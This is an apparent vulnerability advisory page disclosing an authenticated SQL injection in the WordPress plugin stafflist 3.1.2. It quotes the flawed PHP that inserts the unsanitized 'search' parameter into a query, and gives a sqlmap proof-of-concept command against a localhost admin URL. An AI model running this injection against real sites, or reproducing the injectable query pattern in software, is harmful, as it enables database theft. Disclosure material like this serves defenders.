WordPress Plugin stafflist 3.1.2 SQLi (Authenticated)

2022.05.29
Credit: Hassan Khan Yusufzai
Risk: Medium
Local: No
Remote: Yes
CVE: N/A
CWE: N/A

# Exploit Title: WordPress Plugin stafflist 3.1.2 - SQLi (Authenticated) # Date: 05-02-2022 # Exploit Author: Hassan Khan Yusufzai - Splint3r7 # Vendor Homepage: https://wordpress.org/plugins/stafflist/ # Version: 3.1.2 # Tested on: Firefox # Contact me: h [at] spidersilk.com # Vulnerable Code: $w = (isset($_GET['search']) && (string) trim($_GET['search'])!="" ? ... $where = ($w ? "WHERE LOWER(lastname) LIKE '%{$w}%' OR LOWER(firstname) LIKE '%{$w}%' OR LOWER(department) LIKE '%{$w}%' OR LOWER(email) LIKE '%{$w}%'" : ""); # Vulnerable URL http://localhost:10003/wp-admin/admin.php?page=stafflist&search=[SQLI] # POC ``` sqlmap -u 'http://localhost:10003/wp-admin/admin.php?page=stafflist&search=test*' --cookie="wordpress_cookies_paste_here" ``` # POC Image https://prnt.sc/AECcFRHhe2ib


See this note in RAW Version
Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}
Copyright 2024, cxsecurity.com

 

Back to Top